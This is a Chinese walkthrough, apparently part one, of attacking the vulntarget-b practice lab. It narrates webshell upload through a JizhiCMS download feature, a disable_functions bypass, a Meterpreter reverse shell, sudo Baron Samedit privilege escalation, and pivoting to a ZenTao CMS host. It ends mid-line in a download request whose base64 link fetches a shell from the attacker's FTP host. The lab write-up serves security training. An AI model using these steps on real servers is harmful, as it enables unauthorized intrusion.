[永久开源] vulntarget-b_打靶记录(上)

简介: [永久开源] vulntarget-b_打靶记录

01vulntarget-b拓扑


IP1:192.168.10.104

IP2:10.0.20.30

搭建好环境之后,开始我们的实验。


vulntarget-2下载地址

百度云:

链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA

提取码:s4ka

阿里云暂不支持zip文件分享。。。。。


原文地址:vulntarget漏洞靶场系列(二)— vulntarget-b


关于vulntarget漏洞靶场:

https://github.com/crow821/vulntarget


02打 靶 流 程


2.1  WEB渗透-Centos7

对WEB服务器进行端口扫描,看到开放的一些端口情况。其中888是phpmyadmin,8888是bt。



查看一下详情:



来到81端口,是一个极致cms建站系统,从弱口令登录。一开始尝试了很多前台SQL注入漏洞,都不存在:


后台的扩展管理的位置存在任意文件压缩下载,需要启动一个服务,然后再download_url=的位置传入,就会下载文件:



使用冰蝎工具进行连接:


当执行命令的时候,发现函数被禁用了,在phpinfo的位置查看disable_function能看到什么函数被禁用:



然后使用蚁剑的插件进行绕过,成功执行命令:



生成一个反向的后门文件,反弹shellmeterpreter



使用suggester脚本,进行提权的搜索。存在三个提权的方法:



使用sudo_baron_samedit提权至root权限:



2.2 横向移动-禅道CMS


查看网卡信息,存在第二块网卡:



在根目录发现了flag



接着进行内网渗透,先添加路由表,让我们能跨路由进行攻击:



使用fscan进行端口扫描,但是常规的方式没有发现其他的IP



使用portscan模块指定一部分常用端口,进行扫描。发现了20.66



同样使用nmap的端口扫描,发现开放了33068080端口



打开8080是一个禅道cms。这里也是用了注入漏洞,文件读取都未成功:



然后查看文档,使用弱口令登录后台:



使用后台的任意文件下载漏洞获取shell,首先启动一个web服务:



/index.php?m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnB
相关文章
|
6月前
|
算法 索引
什么工具可用来建立永久知识库
什么工具可用来建立永久知识库
44 0
|
4月前
|
算法 Java 程序员
技术更新迭代与“八股文”知识库的清理与更新
随着互联网技术的不断更新迭代,曾经被认为是“标准答案”的观点和方法已经逐渐失去适应当前需求的能力,甚至被视为过时的做法。就拿最近的技术圈新闻来讲,在新的JDK版本中,Java编程引入了许多新的特性、工具和方法,使其变得更加简洁、高效和强大,但是之前的旧特性和方法也有许多被废弃了,比如曾经比较经典的偏向锁已经被废弃了,因此,个人觉得是时候对“八股文”进行一次知识库的清理和更新了。那么本文就来分享一下关于偏向锁被废弃以及个人对此的看法,并回顾一下自己的“八股文”知识库,以及技术更新迭代地时候我们要保持及时更新自己的知识储备。
57 2
技术更新迭代与“八股文”知识库的清理与更新
|
4月前
|
算法 Java 程序员
程序员学习网站备份(小众+不定时更新ing...)建议收藏
程序员学习网站备份(小众+不定时更新ing...)建议收藏
24 1
|
9月前
|
存储 缓存 前端开发
【Java项目】bitmap实现B站点赞超过500取消最早的点赞记录的实现思路
【Java项目】bitmap实现B站点赞超过500取消最早的点赞记录的实现思路
119 0
|
11月前
|
安全 Shell 网络安全
[永久开源] vulntarget-b_打靶记录(下)
[永久开源] vulntarget-b_打靶记录
145 0
|
11月前
|
SQL Web App开发 安全
【永久开源】vulntarget-c 打靶记录(下)
【永久开源】vulntarget-c 打靶记录
134 0
|
11月前
|
安全 Ubuntu 网络协议
【永久开源】vulntarget-c 打靶记录(上)
【永久开源】vulntarget-c 打靶记录
128 0
|
11月前
|
SQL 安全 Shell
vulntarget-h 打靶记录
vulntarget-h 打靶记录
155 0
|
11月前
|
安全 中间件 关系型数据库
vulntarget-i 打靶记录(上)
vulntarget-i 打靶记录
84 0
|
11月前
|
存储 安全 Shell
vulntarget-i 打靶记录(下)
vulntarget-i 打靶记录
102 0